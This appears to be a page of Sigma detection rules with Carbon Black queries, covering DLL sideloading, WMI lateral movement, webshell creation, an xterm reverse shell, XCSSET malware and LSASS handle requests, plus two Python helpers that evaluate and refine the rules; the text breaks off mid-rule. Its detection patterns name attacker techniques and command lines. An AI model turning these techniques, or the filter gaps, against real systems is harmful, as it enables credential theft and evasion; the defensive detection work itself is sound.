    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            - '-Properties*TrustedForDelegation'
            - '-Properties*TrustedToAuthForDelegation'
            - '-Properties*msDS-AllowedToDelegateTo'
            - '-Properties*PrincipalsAllowedToDelegateToAccount'
            - '-LDAPFilter*(userAccountControl:1.2.840.113556.1.4.803:=524288)'
    condition: selection
falsepositives:
    - Legitimate use of the library for administrative activity
level: medium
medium Moderate High FP
Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
Detects a known WMI reconnaissance method that looks for unquoted service paths using wmic. It is often used by pentester and attacker enumeration scripts.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 68bcd73b-37ef-49cb-95fc-edc809730be6
carbon_black query
(OriginalFileName:wmic.exe OR Image:\\WMIC.exe) (CommandLine:\ service\ get\ * CommandLine:name,displayname,pathname,startmode*)
view Sigma YAML
title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
id: 68bcd73b-37ef-49cb-95fc-edc809730be6
related:
    - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b # PowerShell Variant
      type: similar
    - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae
      type: similar
status: test
description: Detects a known WMI reconnaissance method that looks for unquoted service paths using wmic. It is often used by pentester and attacker enumeration scripts.
references:
    - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py
    - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1
    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-20
modified: 2023-09-11
tags:
    - attack.execution
    - attack.t1047
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - OriginalFileName: 'wmic.exe'
        - Image|endswith: '\WMIC.exe'
    selection_cli:
        CommandLine|contains|all:
            - ' service get '
            - 'name,displayname,pathname,startmode'
    condition: all of selection*
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Potential Vivaldi_elf.DLL Sideloading
Detects potential DLL sideloading of "vivaldi_elf.dll"
status test author X__Junior (Nextron Systems) ATT&CK sub-technique id 2092cacb-d77b-4f98-ab0d-32b32f99a054
carbon_black query
ImageLoaded:\\vivaldi_elf.dll (-(Image:\\Vivaldi\\Application\\vivaldi.exe ImageLoaded:\\Vivaldi\\Application\\*))
view Sigma YAML
title: Potential Vivaldi_elf.DLL Sideloading
id: 2092cacb-d77b-4f98-ab0d-32b32f99a054
status: test
description: Detects potential DLL sideloading of "vivaldi_elf.dll"
references:
    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
author: X__Junior (Nextron Systems)
date: 2023-08-03
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\vivaldi_elf.dll'
    filter_main_legit_path:
        Image|endswith: '\Vivaldi\Application\vivaldi.exe'
        ImageLoaded|contains: '\Vivaldi\Application\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
medium Strong High FP
Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
Detects PowerShell as a child of the WmiPrvSE process, which could be a sign of lateral movement via WMI.
status stable author Markus Neis @Karneades ATT&CK sub-technique id 692f0bec-83ba-4d04-af7e-e884a96059b6
carbon_black query
ParentImage:\\WmiPrvSE.exe ((Image:\\powershell.exe OR Image:\\pwsh.exe) OR (OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll))
view Sigma YAML
title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
id: 692f0bec-83ba-4d04-af7e-e884a96059b6
related:
    - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937
      type: similar
    - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d
      type: similar
status: stable
description: Detects PowerShell as a child of the WmiPrvSE process, which could be a sign of lateral movement via WMI.
references:
    - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e
author: Markus Neis @Karneades
date: 2019-04-03
modified: 2023-03-29
tags:
    - attack.execution
    - attack.t1047
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\WmiPrvSE.exe'
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    condition: all of selection_*
falsepositives:
    - AppvClient
    - CCM
    - WinRM
level: medium
medium Strong Medium FP
Potential WWlib.DLL Sideloading
Detects potential DLL sideloading of "wwlib.dll"
status test author X__Junior (Nextron Systems) ATT&CK sub-technique id e2e01011-5910-4267-9c3b-4149ed5479cf
carbon_black query
ImageLoaded:\\wwlib.dll (-((Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\ Office\\* OR Image:C\:\\Program\ Files\\Microsoft\ Office\\*) Image:\\winword.exe (ImageLoaded:C\:\\Program\ Files\ \(x86\)\\Microsoft\ Office\\* OR ImageLoaded:C\:\\Program\ Files\\Microsoft\ Office\\*)))
view Sigma YAML
title: Potential WWlib.DLL Sideloading
id: e2e01011-5910-4267-9c3b-4149ed5479cf
status: test
description: Detects potential DLL sideloading of "wwlib.dll"
references:
    - https://twitter.com/WhichbufferArda/status/1658829954182774784
    - https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/
    - https://securelist.com/apt-luminousmoth/103332/
author: X__Junior (Nextron Systems)
date: 2023-05-18
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\wwlib.dll'
    filter_main_path:
        Image|startswith:
            - 'C:\Program Files (x86)\Microsoft Office\'
            - 'C:\Program Files\Microsoft Office\'
        Image|endswith: '\winword.exe'
        ImageLoaded|startswith:
            - 'C:\Program Files (x86)\Microsoft Office\'
            - 'C:\Program Files\Microsoft Office\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
medium Strong Medium FP
Potential Wazuh Security Platform DLL Sideloading
Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
status: test · author: X__Junior (Nextron Systems) · ATT&CK mapping: sub-technique · id: db77ce78-7e28-4188-9337-cf30e2b3ba9f
carbon_black query
(ImageLoaded:\\libwazuhshared.dll OR ImageLoaded:\\libwinpthread\-1.dll) (-(ImageLoaded:C\:\\Program\ Files\\* OR ImageLoaded:C\:\\Program\ Files\ \(x86\)\\*)) (-((ImageLoaded:\\AppData\\Local\\* OR ImageLoaded:\\ProgramData\\*) ImageLoaded:\\mingw64\\bin\\libwinpthread\-1.dll))
view Sigma YAML
title: Potential Wazuh Security Platform DLL Sideloading
id: db77ce78-7e28-4188-9337-cf30e2b3ba9f
status: test
description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
references:
    - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
author: X__Junior (Nextron Systems)
date: 2023-03-13
modified: 2023-05-12
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith:
            - '\libwazuhshared.dll'
            - '\libwinpthread-1.dll'
    filter_main_generic:
        ImageLoaded|startswith:
            - 'C:\Program Files\'
            - 'C:\Program Files (x86)\'
    filter_optional_mingw64:
        # Note: Many third party apps installed in "AppData" or "ProgramData" and leverage "mingw64" make use of "libwinpthread-1.dll"
        # In production its best to make a list of these apps and replace this filter with a specific one.
        ImageLoaded|contains:
            - '\AppData\Local\'
            - '\ProgramData\'
        ImageLoaded|endswith: '\mingw64\bin\libwinpthread-1.dll'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)
level: medium
medium Strong Medium FP
Potential Webshell Creation On Static Website
Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
status: test · author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo · ATT&CK mapping: sub-technique · id: 39f1f9f2-9636-45de-98f6-a4046aa8e4b9
carbon_black query
((TargetFilename:\\inetpub\\wwwroot\\* (TargetFilename:.ashx* OR TargetFilename:.asp* OR TargetFilename:.ph* OR TargetFilename:.soap*)) OR ((TargetFilename:\\www\\* OR TargetFilename:\\htdocs\\* OR TargetFilename:\\html\\*) TargetFilename:.ph*)) (-((TargetFilename:\\AppData\\Local\\Temp\\* OR TargetFilename:\\Windows\\Temp\\*) OR Image:System OR TargetFilename:\\xampp*))
view Sigma YAML
title: Potential Webshell Creation On Static Website
id: 39f1f9f2-9636-45de-98f6-a4046aa8e4b9
status: test
description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
references:
    - PT ESC rule and personal experience
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md
author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
date: 2019-10-22
modified: 2023-10-15
tags:
    - attack.persistence
    - attack.t1505.003
logsource:
    product: windows
    category: file_event
detection:
    selection_wwwroot_path:
        TargetFilename|contains: '\inetpub\wwwroot\'
    selection_wwwroot_ext:
        TargetFilename|contains:
            - '.ashx'
            - '.asp'
            - '.ph'
            - '.soap'
    selection_htdocs_path:
        TargetFilename|contains:
            - '\www\'
            - '\htdocs\'
            - '\html\'
    selection_htdocs_ext:
        TargetFilename|contains: '.ph'
    # selection_tomcat_path:
    #     TargetFilename|contains: '\webapps\ROOT'
    # selection_tomcat_ext:
    #     TargetFilename|contains:
    #         - '.jsp' # .jspx, .jspf
    #         - '.jsv'
    #         - '.jsw'
    filter_main_temp:  # FP when unpacking some executables in $TEMP
        TargetFilename|contains:
            - '\AppData\Local\Temp\'
            - '\Windows\Temp\'
    filter_main_system:
        Image: 'System' # FP when backup/restore from drivers
    filter_main_legitimate:
        TargetFilename|contains: '\xampp'
    condition: (all of selection_wwwroot_* or all of selection_htdocs_*) and not 1 of filter_main_*
falsepositives:
    - Legitimate administrator or developer creating legitimate executable files in a web application folder
level: medium
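The three rules above (the WmiPrvSE child-process rule at the top of this section, Potential WWlib.DLL Sideloading and Potential Webshell Creation On Static Website) reduce to the same handful of Sigma constructs: endswith/startswith/contains modifiers, a list of mappings as an OR, and `all of X_*` / `1 of X_*` conditions with `not` applied to the filters. The following Python is an added example, not code from the Sigma project or from this corpus: it implements just those constructs and replays the three rules over constructed events, so you can confirm what each filter excludes before pasting the Carbon Black rendering. The conditions are transcribed by hand rather than parsed from the YAML, and the events use the Sysmon-style field names the rules themselves use.

```python
"""Minimal evaluator for the Sigma constructs used by the rules on this page.

Added example, not code from the Sigma project or this corpus. It covers exact
match, endswith, startswith, contains and contains|all (case-insensitive, as
Sigma specifies), list-of-maps selections (OR) and the 'all of X_*' / '1 of X_*'
condition forms. Conditions are transcribed by hand; events are constructed.
"""


def field_matches(event, key, spec):
    """Evaluate one 'Field|modifier: value(s)' line of a selection against an event."""
    field, *mods = key.split("|")
    actual = str(event.get(field, "")).lower()
    values = [str(v).lower() for v in (spec if isinstance(spec, list) else [spec])]
    if "all" in mods:                       # contains|all: every value must appear
        return all(v in actual for v in values)
    if "endswith" in mods:
        return any(actual.endswith(v) for v in values)
    if "startswith" in mods:
        return any(actual.startswith(v) for v in values)
    if "contains" in mods:
        return any(v in actual for v in values)
    return actual in values                 # no modifier: exact, case-insensitive


def selection_matches(event, sel):
    """A mapping is an AND of its lines; a list of mappings is an OR of them."""
    if isinstance(sel, list):
        return any(selection_matches(event, s) for s in sel)
    return all(field_matches(event, k, v) for k, v in sel.items())


def evaluate(rule, event):
    """True when the rule's condition holds; it receives 'all of' / '1 of' helpers."""
    hits = {name: selection_matches(event, sel) for name, sel in rule["detection"].items()}
    def all_of(prefix): return all(v for k, v in hits.items() if k.startswith(prefix))
    def one_of(prefix): return any(v for k, v in hits.items() if k.startswith(prefix))
    return rule["condition"](all_of, one_of)


OFFICE = ["C:\\Program Files (x86)\\Microsoft Office\\", "C:\\Program Files\\Microsoft Office\\"]

# The process_creation rule at the top of this section: PowerShell under WmiPrvSE.
WMI_CHILD = {
    "detection": {
        "selection_parent": {"ParentImage|endswith": "\\WmiPrvSE.exe"},
        "selection_img": [{"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"]},
                          {"OriginalFileName": ["PowerShell.EXE", "pwsh.dll"]}],
    },
    "condition": lambda all_of, one_of: all_of("selection_"),
}

# Potential WWlib.DLL Sideloading: selection and not 1 of filter_main_*
WWLIB = {
    "detection": {
        "selection": {"ImageLoaded|endswith": "\\wwlib.dll"},
        "filter_main_path": {"Image|startswith": OFFICE, "Image|endswith": "\\winword.exe",
                             "ImageLoaded|startswith": OFFICE},
    },
    "condition": lambda all_of, one_of: all_of("selection") and not one_of("filter_main_"),
}

# Potential Webshell Creation On Static Website
WEBSHELL = {
    "detection": {
        "selection_wwwroot_path": {"TargetFilename|contains": "\\inetpub\\wwwroot\\"},
        "selection_wwwroot_ext": {"TargetFilename|contains": [".ashx", ".asp", ".ph", ".soap"]},
        "selection_htdocs_path": {"TargetFilename|contains": ["\\www\\", "\\htdocs\\", "\\html\\"]},
        "selection_htdocs_ext": {"TargetFilename|contains": ".ph"},
        "filter_main_temp": {"TargetFilename|contains": ["\\AppData\\Local\\Temp\\", "\\Windows\\Temp\\"]},
        "filter_main_system": {"Image": "System"},
        "filter_main_legitimate": {"TargetFilename|contains": "\\xampp"},
    },
    "condition": lambda all_of, one_of: (all_of("selection_wwwroot_") or all_of("selection_htdocs_"))
    and not one_of("filter_main_"),
}

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
WMI = "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
SAMPLES = [  # (label, rule, constructed event)
    ("wmi_powershell", WMI_CHILD, {"ParentImage": WMI, "Image": PS, "OriginalFileName": "PowerShell.EXE"}),
    ("wmi_renamed", WMI_CHILD, {"ParentImage": WMI, "Image": "C:\\Users\\Public\\p.exe",
                                "OriginalFileName": "PowerShell.EXE"}),
    ("svchost_parent", WMI_CHILD, {"ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": PS}),
    ("wwlib_legit", WWLIB, {"Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
                            "ImageLoaded": "C:\\Program Files\\Microsoft Office\\root\\Office16\\wwlib.dll"}),
    ("wwlib_sideload", WWLIB, {"Image": "C:\\Users\\Public\\winword.exe",
                               "ImageLoaded": "C:\\Users\\Public\\wwlib.dll"}),
    ("aspx_upload", WEBSHELL, {"TargetFilename": "C:\\inetpub\\wwwroot\\uploads\\cmd.aspx",
                               "Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe"}),
    ("xampp_php", WEBSHELL, {"TargetFilename": "C:\\xampp\\htdocs\\index.php",
                             "Image": "C:\\xampp\\apache\\bin\\httpd.exe"}),
]


def run_samples():
    """Verdict per sample label."""
    return {label: evaluate(rule, event) for label, rule, event in SAMPLES}
```

Two things the replay makes visible: the renamed PowerShell binary is still caught through `OriginalFileName`, which is why the rule lists it beside `Image`, and the wwlib filter only drops the load when all three of its lines hold, so a genuine WINWORD.EXE copied next to a rogue wwlib.dll in a user-writable directory still alerts. The `.ph` substring in the webshell rule also covers `.phtml` and `.php7`, which is deliberate but worth knowing when tuning.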
medium Strong Medium FP
Potential XCSSET Malware Infection
Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
status: test · author: Tim Rauch (rule), Elastic (idea) · ATT&CK mapping: tactic-only · id: 47d65ac0-c06f-4ba2-a2e3-d263139d0f51
carbon_black query
((ParentImage:\/bash Image:\/curl (CommandLine:\/sys\/log.php* OR CommandLine:\/sys\/prepod.php* OR CommandLine:\/sys\/bin\/Pods*)) CommandLine:https\:\/\/*) OR ((ParentImage:\/bash Image:\/osacompile (CommandLine:\/Users\/* CommandLine:\/Library\/Group\ Containers\/*)) OR (ParentImage:\/bash Image:\/plutil (CommandLine:LSUIElement* CommandLine:\/Users\/* CommandLine:\/Library\/Group\ Containers\/*)) OR (Image:\/zip (CommandLine:\-r* CommandLine:\/Users\/* CommandLine:\/Library\/Group\ Containers\/*)))
view Sigma YAML
title: Potential XCSSET Malware Infection
id: 47d65ac0-c06f-4ba2-a2e3-d263139d0f51
status: test
description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
references:
    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08
    - https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset
author: Tim Rauch (rule), Elastic (idea)
date: 2022-10-17
tags:
    - attack.command-and-control
logsource:
    category: process_creation
    product: macos
detection:
    selection_1_curl:
        ParentImage|endswith: '/bash'
        Image|endswith: '/curl'
        CommandLine|contains:
            - '/sys/log.php'
            - '/sys/prepod.php'
            - '/sys/bin/Pods'
    selection_1_https:
        CommandLine|contains: 'https://'
    selection_other_1:
        ParentImage|endswith: '/bash'
        Image|endswith: '/osacompile'
        CommandLine|contains|all:
            - '/Users/'
            - '/Library/Group Containers/'
    selection_other_2:
        ParentImage|endswith: '/bash'
        Image|endswith: '/plutil'
        CommandLine|contains|all:
            - 'LSUIElement'
            - '/Users/'
            - '/Library/Group Containers/'
    selection_other_3:
        Image|endswith: '/zip'
        CommandLine|contains|all:
            - '-r'
            - '/Users/'
            - '/Library/Group Containers/'
    condition: all of selection_1_* or 1 of selection_other_*
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
Potential Xterm Reverse Shell
Detects usage of "xterm" as a potential reverse shell tunnel
status: test · author: @d4ns4n_ · ATT&CK mapping: technique · id: 4e25af4b-246d-44ea-8563-e42aacab006b
carbon_black query
Image:xterm* CommandLine:\-display* CommandLine:\:1
view Sigma YAML
title: Potential Xterm Reverse Shell
id: 4e25af4b-246d-44ea-8563-e42aacab006b
status: test
description: Detects usage of "xterm" as a potential reverse shell tunnel
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-24
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: 'xterm'
        CommandLine|contains: '-display'
        CommandLine|endswith: ':1'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Strong Medium FP
Potentially Over Permissive Permissions Granted Using Dsacls.EXE
Detects usage of Dsacls to grant over permissive permissions
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · id: 01c42d3c-242d-4655-85b2-34f1739632f7
carbon_black query
(Image:\\dsacls.exe OR OriginalFileName:DSACLS.EXE) CommandLine:\ \/G\ * (CommandLine:GR* OR CommandLine:GE* OR CommandLine:GW* OR CommandLine:GA* OR CommandLine:WP* OR CommandLine:WD*)
view Sigma YAML
title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE
id: 01c42d3c-242d-4655-85b2-34f1739632f7
status: test
description: Detects usage of Dsacls to grant over permissive permissions
references:
    - https://ss64.com/nt/dsacls.html
    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-20
modified: 2023-02-04
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\dsacls.exe'
        - OriginalFileName: "DSACLS.EXE"
    selection_flag:
        CommandLine|contains: ' /G '
    selection_permissions:
        CommandLine|contains: # Add more permissions as you see fit in your environment
            - 'GR'
            - 'GE'
            - 'GW'
            - 'GA'
            - 'WP'
            - 'WD'
    condition: all of selection_*
falsepositives:
    - Legitimate administrators granting over permissive permissions to users
level: medium
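The rule above matches its permission codes as plain substrings anywhere on a command line that carries ` /G `, and Sigma string matching is case-insensitive, so `GR` also matches the `Gr` in an OU called Groups. That is the source of its Medium FP estimate. The following Python is an added example, not the rule's or Nextron's code: it parses the command line into the /G grants dsacls actually takes (`user:permissions[;objecttype[;inheritedobjecttype]]`, with the two-letter codes concatenated, as in the ss64 and Microsoft references listed) and reports only grants that really carry one of the rule's listed rights. The command lines, domain and OU names are constructed placeholders.

```python
"""Parse dsacls /G grants instead of substring-matching their permission codes.

Added example, not the rule's code. dsacls takes each grant as
user:permissions[;objecttype[;inheritedobjecttype]] with two-letter codes
concatenated (e.g. RPWP); this splits the command line on that syntax and
reports only grants that carry one of the rule's listed rights. The command
lines, domain and OU names are constructed placeholders.
"""
import shlex

# selection_permissions of the rule
OVER_PERMISSIVE = {"GR", "GE", "GW", "GA", "WP", "WD"}


def parse_grants(cmdline):
    """[(trustee, {codes}), ...] for every /G grant on the command line."""
    tokens = shlex.split(cmdline, posix=False)   # keeps backslashes; quotes stay on tokens
    grants = []
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() == "/g":
            trustee, _, rest = tokens[i + 1].strip('"').partition(":")
            perms = rest.split(";")[0]           # drop object-type qualifiers
            codes = {perms[j:j + 2].upper() for j in range(0, len(perms), 2)}
            grants.append((trustee, codes))
    return grants


def over_permissive_grants(cmdline):
    """Grants that really carry a listed right, with the offending codes."""
    return [(t, sorted(c & OVER_PERMISSIVE))
            for t, c in parse_grants(cmdline) if c & OVER_PERMISSIVE]


def rule_as_written(cmdline):
    """selection_flag and selection_permissions of the rule (selection_img assumed true)."""
    low = cmdline.lower()
    return " /g " in low and any(code.lower() in low for code in OVER_PERMISSIVE)


SAMPLES = {
    "grant_ga": 'dsacls "OU=Servers,DC=corp,DC=local" /G "CORP\\svc-deploy:GA"',
    "grant_wp": 'dsacls "OU=Workstations,DC=corp,DC=local" /G CORP\\alice:RPWP;member',
    "read_only": 'dsacls "OU=Groups,DC=corp,DC=local" /G "CORP\\helpdesk:RPLC"',
    "no_grant": 'dsacls "OU=Groups,DC=corp,DC=local"',
}


def compare():
    """Label -> (rule as written fired?, parsed over-permissive grants)."""
    return {k: (rule_as_written(v), over_permissive_grants(v)) for k, v in SAMPLES.items()}


if __name__ == "__main__":
    for label, (fired, grants) in compare().items():
        print(f"{label:10} rule={fired!s:5} parsed={grants}")
```

The `read_only` sample is the false positive to look for in your own data: the rule fires on the `Gr` of `OU=Groups` although the grant is only RP and LC. Where the EDR gives you the full command line, the parsed form is what to alert on; the substring form remains useful as a cheap first-stage filter.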
medium Strong Medium FP
Potentially Suspicious AccessMask Requested From LSASS
Detects a process requesting a handle to the LSASS process with certain access masks
status: test · author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) · ATT&CK mapping: sub-technique · id: 4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76
carbon_black query
((EventID:4656 ObjectName:\\lsass.exe (AccessMask:0x40* OR AccessMask:0x1400* OR AccessMask:0x100000* OR AccessMask:0x1410* OR AccessMask:0x1010* OR AccessMask:0x1438* OR AccessMask:0x143a* OR AccessMask:0x1418* OR AccessMask:0x1f0fff* OR AccessMask:0x1f1fff* OR AccessMask:0x1f2fff* OR AccessMask:0x1f3fff*)) OR (EventID:4663 ObjectName:\\lsass.exe (AccessList:4484* OR AccessList:4416*))) (-(((ProcessName:\\csrss.exe OR ProcessName:\\GamingServices.exe OR ProcessName:\\lsm.exe OR ProcessName:\\MicrosoftEdgeUpdate.exe OR ProcessName:\\minionhost.exe OR ProcessName:\\MRT.exe OR ProcessName:\\MsMpEng.exe OR ProcessName:\\perfmon.exe OR ProcessName:\\procexp.exe OR ProcessName:\\procexp64.exe OR ProcessName:\\svchost.exe OR ProcessName:\\taskmgr.exe OR ProcessName:\\thor.exe OR ProcessName:\\thor64.exe OR ProcessName:\\vmtoolsd.exe OR ProcessName:\\VsTskMgr.exe OR ProcessName:\\wininit.exe OR ProcessName:\\wmiprvse.exe OR ProcessName:RtkAudUService64) (ProcessName:\:\\Program\ Files\ \(x86\)\\* OR ProcessName:\:\\Program\ Files\\* OR ProcessName:\:\\ProgramData\\Microsoft\\Windows\ Defender\\Platform\\* OR ProcessName:\:\\Windows\\SysNative\\* OR ProcessName:\:\\Windows\\System32\\* OR ProcessName:\:\\Windows\\SysWow64\\* OR ProcessName:\:\\Windows\\Temp\\asgard2\-agent\\*)) OR ProcessName:\:\\Program\ Files* OR (ProcessName:\:\\Windows\\System32\\taskhostw.exe OR ProcessName:\:\\Windows\\System32\\msiexec.exe OR ProcessName:\:\\Windows\\CCM\\CcmExec.exe) OR (ProcessName:\:\\Windows\\Sysmon64.exe AccessList:%%4484*) OR (ProcessName:\:\\Windows\\Temp\\asgard2\-agent\-sc\\aurora\\* ProcessName:\\aurora\-agent\-64.exe AccessList:%%4484*) OR (ProcessName:\\x64\\SCENARIOENGINE.EXE AccessList:%%4484*) OR ((ProcessName:\:\\Users\\* ProcessName:\\AppData\\Local\\Temp\\is\-*) ProcessName:\\avira_system_speedup.tmp AccessList:%%4484*) OR (ProcessName:\:\\Windows\\Temp\\* ProcessName:\\avira_speedup_setup_update.tmp AccessList:%%4484*) OR (ProcessName:\:\\Windows\\System32\\snmp.exe AccessList:%%4484*) OR (ProcessName:\:\\Windows\\SystemTemp\\* ProcessName:\\GoogleUpdate.exe AccessList:%%4484*))) (-((ProcessName:\\procmon64.exe OR ProcessName:\\procmon.exe) AccessList:%%4484*))
view Sigma YAML
title: Potentially Suspicious AccessMask Requested From LSASS
id: 4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76
status: test
description: Detects a process requesting a handle to the LSASS process with certain access masks
references:
    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)
date: 2019-11-01
modified: 2023-12-19
tags:
    - attack.credential-access
    - car.2019-04-004
    - attack.t1003.001
logsource:
    product: windows
    service: security
detection:
    selection_1:
        EventID: 4656 # A handle to an object was requested.
        ObjectName|endswith: '\lsass.exe'
        AccessMask|contains:
            - '0x40'
            - '0x1400'
            # - '0x1000'  # minimum access requirements to query basic info from service
            - '0x100000'
            - '0x1410'    # car.2019-04-004
            - '0x1010'    # car.2019-04-004
            - '0x1438'    # car.2019-04-004
            - '0x143a'    # car.2019-04-004
            - '0x1418'    # car.2019-04-004
            - '0x1f0fff'
            - '0x1f1fff'
            - '0x1f2fff'
            - '0x1f3fff'
    selection_2:
        EventID: 4663 # An attempt was made to access an object
        ObjectName|endswith: '\lsass.exe'
        AccessList|contains:
            - '4484'
            - '4416'
    filter_main_specific:
        ProcessName|endswith:
            - '\csrss.exe'
            - '\GamingServices.exe'
            - '\lsm.exe'
            - '\MicrosoftEdgeUpdate.exe'
            - '\minionhost.exe'  # Cyberreason
            - '\MRT.exe'         # MS Malware Removal Tool
            - '\MsMpEng.exe'     # Defender
            - '\perfmon.exe'
            - '\procexp.exe'
            - '\procexp64.exe'
            - '\svchost.exe'
            - '\taskmgr.exe'
            - '\thor.exe'        # THOR
            - '\thor64.exe'      # THOR
            - '\vmtoolsd.exe'
            - '\VsTskMgr.exe'    # McAfee Enterprise
            - '\wininit.exe'
            - '\wmiprvse.exe'
            - 'RtkAudUService64' # https://medium.com/falconforce/the-curious-case-of-realtek-and-lsass-33fc0c8482ff
        ProcessName|contains:
            - ':\Program Files (x86)\'
            - ':\Program Files\'
            - ':\ProgramData\Microsoft\Windows Defender\Platform\'
            - ':\Windows\SysNative\'
            - ':\Windows\System32\'
            - ':\Windows\SysWow64\'
            - ':\Windows\Temp\asgard2-agent\'
    filter_main_generic:
        ProcessName|contains: ':\Program Files'  # too many false positives with legitimate AV and EDR solutions
    filter_main_exact:
        ProcessName|endswith:
            - ':\Windows\System32\taskhostw.exe'
            - ':\Windows\System32\msiexec.exe'
            - ':\Windows\CCM\CcmExec.exe'
    filter_main_sysmon:
        ProcessName|endswith: ':\Windows\Sysmon64.exe'
        AccessList|contains: '%%4484'
    filter_main_aurora:
        ProcessName|contains: ':\Windows\Temp\asgard2-agent-sc\aurora\'
        ProcessName|endswith: '\aurora-agent-64.exe'
        AccessList|contains: '%%4484'
    filter_main_scenarioengine:
        # Example: C:\a70de9569c3a5aa22184ef52a890177b\x64\SCENARIOENGINE.EXE
        ProcessName|endswith: '\x64\SCENARIOENGINE.EXE'
        AccessList|contains: '%%4484'
    filter_main_avira1:
        ProcessName|contains|all:
            - ':\Users\'
            - '\AppData\Local\Temp\is-'
        ProcessName|endswith: '\avira_system_speedup.tmp'
        AccessList|contains: '%%4484'
    filter_main_avira2:
        ProcessName|contains: ':\Windows\Temp\'
        ProcessName|endswith: '\avira_speedup_setup_update.tmp'
        AccessList|contains: '%%4484'
    filter_main_snmp:
        ProcessName|endswith: ':\Windows\System32\snmp.exe'
